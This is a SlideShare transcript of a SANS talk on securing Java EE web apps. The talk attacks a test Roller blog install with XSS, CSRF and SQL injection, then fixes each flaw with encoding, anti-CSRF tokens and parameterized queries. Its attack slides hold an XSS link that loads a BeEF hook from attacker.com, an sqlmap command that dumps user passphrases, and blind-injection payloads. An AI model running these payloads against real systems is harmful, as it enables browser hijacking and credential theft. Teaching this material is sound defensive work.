• Like
  • Save
Securing Java EE Web Apps
Upcoming SlideShare
Loading in...5
×
 

Securing Java EE Web Apps

on

  • 4,826 views

 

Statistics

Views

Total Views
4,826
Views on SlideShare
4,788
Embed Views
38

Actions

Likes
7
Downloads
102
Comments
0

4 Embeds 38

http://paper.li 29
http://a0.twimg.com 7
http://oracle.sociview.com 1
https://twitter.com 1

Accessibility

Categories

Upload Details

Uploaded via as Microsoft PowerPoint

Usage Rights

© All Rights Reserved

Report content

Flagged as inappropriate Flag as inappropriate
Flag as inappropriate

Select your reason for flagging this presentation as inappropriate.

Cancel
  • Full Name Full Name Comment goes here.
    Are you sure you want to
    Your message goes here
    Processing…
Post Comment
Edit your comment
  • 2 -
  • 2 -
  • 2 -
  • 2 -
  • 2 -
  • 2 -
  • 2 -
  • 2 -
  • 2 -
  • 2 -
  • 2 -
  • 2 -
  • 2 -
  • 2 -
  • This slide deck is for presentations only. This slide deck is for presentations only.
  • 2 -
  • 2 -
  • SANS has a number of free resources that you can access to learn about application and software security. The SANS Software Security web site has free white papers, webcasts, and other information as well as the associated AppSec Street Fighter blog. You can also follow us on Twitter for the latest news, information, and discounts on upcoming events. SANS has various courses on web application security, secure coding, and penetration testing where you can learn the skills required to create more secure applications. These courses include the following: DEV522: Web Application Security Essentials is a six-day course where you learn how to create secure web applications that are resistant to attack. DEV541: Secure Coding in Java/JEE is a four-day course that covers secure coding techniques that you can use to build more secure Java/JEE applications. DEV530: Essential Secure Coding in Java/JEE is a two-day course that covers the most essential topics for creating Java web apps. This course is ideal for students who cannot be away from the office for extended periods of time. DEV544: Secure Coding in .NET is a four-day course that covers secure coding techniques that you can use to build more secure .NET applications. DEV532: Essential Secure Coding in ASP.NET is a two-day course that covers the most essential topics for creating APS.NET apps. This course is ideal for students who cannot be away from the office for extended periods of time. DEV542: Web App Pentesting & Ethical Hacking is a six-day course where you learn how to hack web applications.

Securing Java EE Web Apps Securing Java EE Web Apps Presentation Transcript

  • Securing Java EE Web Apps
    • Frank Kim
    • Principal, ThinkSec
    • Author, SANS Institute
  • About
    • Frank Kim
      • Consultant, ThinkSec
      • Author, SANS Secure Coding in Java/JEE
      • SANS Application Security Curriculum Lead
  • What You Should Know
    • Hacking is not hard
    • Don’t trust any data
      • Assume that your users are evil!
  • Outline
    • Web App Attack Refresher
      • XSS, CSRF, SQL Injection
    • Testing
      • Hacking an open source app
    • Secure Coding
      • Fixing security bugs
  • Cross-Site Scripting (XSS)
    • Occurs when unvalidated data is displayed back to the browser
    • Types of XSS
      • Stored
      • Reflected
      • Document Object Model (DOM) based
  • Cross-Site Request Forgery (CSRF)
  • SQL Injection (SQLi)
    • Occurs when dynamic SQL queries are used
      • By injecting arbitrary SQL commands, attackers can extend the meaning of the original query
      • Can potentially execute any SQL statement on the database
    • Very powerful
      • #1 on CWE/SANS Top 25 Most Dangerous Software Errors
      • #1 on OWASP Top 10
  • Outline
    • Web App Attack Refresher
      • XSS, CSRF, SQL Injection
    • Testing
      • Hacking an open source app
    • Secure Coding
      • Fixing security bugs
  • What are We Testing?
    • Installation of Roller 3.0
    • Fake install of SANS AppSec Street Fighter Blog
    • Want to simulate the actions that a real attacker might take
      • There are definitely other avenues of attack
      • We're walking through one attack scenario
  • Attack Scenario
    • XSS to control the victim's browser
    • Combine XSS and CSRF to conduct a privilege escalation attack
        • - Use escalated privileges to access another feature
    • Use SQL Injection to access the database directly
  • Spot the Vuln - XSS
  • XSS in head.jsp
  • Testing the "look" Param
    • Admin pages include head.jsp
    • The param is persistent for the session
  • XSS Exploitation
    • Introducing BeEF
      • Browser Exploitation Framework
      • http://www.bindshell.net/tools/beef
    • Uses XSS to hook the victim's browser
      • Log user keystrokes, view browsing history, execute JavaScript, etc
      • Advanced attacks - Metasploit integration, browser exploits, etc
  • XSS Exploitation Overview Victim 1) Sends link with evil BeEF script http://localhost:8080/roller/roller-ui/yourWebsites.do?look=&quot;><script src=&quot;http://www.attacker.com/beef/hook/beefmagic.js.php&quot;></script> 2) Victim clicks evil link 3) Victim's browser sends data to attacker Attacker
  • BeEF XSS Demo
  • Spot the Vuln - CSRF
  • CSRF in UserAdmin.jsp Want to use CSRF to change this field
  • CSRF Demo
  • Spot the Vuln – SQL Injection
  • SQL Injection in UserServlet
  • SQL Injection Testing
    • UserServlet is vulnerable to SQLi
      • http://localhost:8080/roller/roller-ui/authoring/user
    No results
  • Exploiting SQL Injection
    • Introducing sqlmap
      • http://sqlmap.sourceforge.net
    • Tool that automates detection and exploitation of SQL Injection vulns
      • Supports MySQL, Oracle, PostgreSQL, MS SQL Server
      • Supports blind, inband, and batch queries
      • Fingerprint/enumeration - dump db schemas, tables/column names, data, db users, etc
      • Takeover features - read/upload files, exec arbitrary commands, exec Metasploit shellcode, etc
  • sqlmap Syntax
    •  Dump userids and passwords
      • python sqlmap.py
      • -u &quot;http://localhost:8080/roller/roller-ui/authoring/user?startsWith=f%25&quot;
      • --cookie &quot;username=test; JSESSIONID==<INSERT HERE>&quot;
      • --drop-set-cookie -p startsWith
      • --dump -T rolleruser -C username,passphrase -v 2
  • SQL Injection Demo
  • How it Works
    • f%' AND ORD(MID((SELECT IFNULL(CAST(passphrase AS CHAR(10000)), CHAR(32)) FROM roller.rolleruser LIMIT 2, 1), 1, 1)) > 103 AND 'neEy' LIKE 'neEy
    • f%' AND ORD(MID((SELECT IFNULL(CAST(passphrase AS CHAR(10000)), CHAR(32)) FROM roller.rolleruser LIMIT 2, 1), 1, 1)) > 104 AND 'neEy' LIKE 'neEy
    • f%' AND ORD(MID((SELECT IFNULL(CAST(passphrase AS CHAR(10000)), CHAR(32)) FROM roller.rolleruser LIMIT 2, 1), 1, 1)) > 105 AND 'neEy' LIKE 'neEy
  • Step By Step [0]
    • SELECT IFNULL(CAST(passphrase AS CHAR(10000)), CHAR(32)) FROM roller.rolleruser LIMIT 2, 1 ;
    • returns ilovethetajmahal
  • Step By Step [1]
    • select MID ((SELECT IFNULL(CAST(passphrase AS CHAR(10000)), CHAR(32)) FROM roller.rolleruser LIMIT 2, 1), 1 , 1);
    • returns i
    • select MID ((SELECT IFNULL(CAST(passphrase AS CHAR(10000)), CHAR(32)) FROM roller.rolleruser LIMIT 2, 1), 2 , 1);
    • returns l
    • select MID ((SELECT IFNULL(CAST(passphrase AS CHAR(10000)), CHAR(32)) FROM roller.rolleruser LIMIT 2, 1), 3 , 1);
    • returns o
  • Step By Step [2]
    • select ORD (MID((SELECT IFNULL(CAST(passphrase AS CHAR(10000)), CHAR(32)) FROM roller.rolleruser LIMIT 2, 1), 1 , 1));
    • returns 105
    • select ORD (MID((SELECT IFNULL(CAST(passphrase AS CHAR(10000)), CHAR(32)) FROM roller.rolleruser LIMIT 2, 1), 2 , 1));
    • returns 108
    • select ORD (MID((SELECT IFNULL(CAST(passphrase AS CHAR(10000)), CHAR(32)) FROM roller.rolleruser LIMIT 2, 1), 3 , 1));
    • returns 111
  • Attack Summary
    • XSS to control the victim's browser
    • Combine XSS and CSRF to conduct a privilege escalation attack
        • - Use escalated privileges to access another feature
    • Use SQL Injection to access the database directly
  • Outline
    • Web App Attack Refresher
      • XSS, CSRF, SQL Injection
    • Testing
      • Hacking an open source app
    • Secure Coding
      • Fixing security bugs
  • Data Validation Application Should I be consuming this? Should I be emitting this? Inbound Data Outbound Data Data Store Validation Encoding Encoding Validation Outbound Data Inbound Data Validation
  • Output Encoding
    • Encoding
      • Convert characters so they are treated as data and not special characters
    • Must escape differently depending where data is displayed on the page
    • XSS Prevention Cheat Sheet
      • http://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet
  • Fix XSS in head.jsp
    • Add URL encoding
    • <link rel=&quot;stylesheet&quot; type=&quot;text/css&quot; media=&quot;all&quot; href=&quot;<%= request.getContextPath() %>/roller-ui/theme/<%= ESAPI.encoder().encodeForURL(theme) %>/colors.css&quot; />
  • Fix CSRF
    • UserAdmin.jsp
      • Add anti-CSRF token
    • <input type=&quot;hidden&quot; name=<%= CSRFTokenUtil.SESSION_ATTR_KEY %> value=<%= CSRFTokenUtil.getToken(request.getSession(false)) %> >
    • UserAdminAction.java
      • Check anti-CSRF token
    • if (!CSRFTokenUtil.isValid(req.getSession(false), req)){
      • return mapping.findForward(&quot;error&quot;);
      • }
  • Fix SQL Injection
    • Use parameterized queries correctly
    • if (startsWith == null || startsWith.equals(&quot;&quot;)) {
    • query = &quot;SELECT username, emailaddress FROM rolleruser&quot;;
    • stmt = con.prepareStatement(query);
    • } else {
    • query = &quot;SELECT username, emailaddress FROM rolleruser
    • WHERE username like ? or emailaddress like ? &quot;;
    • stmt = con.prepareStatement (query);
    • stmt.setString (1, startsWith + &quot;%&quot;);
    • stmt.setString (2, startsWith + &quot;%&quot;);
    • }
    • rs = stmt.executeQuery();
  • Building Secure Software Source: Microsoft SDL
  • Remember
    • Hacking is not hard
    • Don’t trust any data
      • Validate input
        • Prefer whitelists
        • Use authenticity token
      • Encode output
        • Contextual encoding
        • Use parameterized queries
  • SANS Software Security
    • SANS AppSec 2012
      • - April 30 - May 1 in Las Vegas
      • - CFP is open now!
      • - http://sans.org/appsec-2012
    • New courses
      • - DEV551 Secure iOS Development
      • - DEV568 Secure Android Development
    • Free resources
      • - Top 25, blog, white papers, webcasts, and more at
      • - http://software-security.sans.org
    • Discount
      • - Save 10% using the discount code DEVOXX. Enterprise pricing avail.
  • Thanks!
    • Frank Kim
    • [email_address] @sansappsec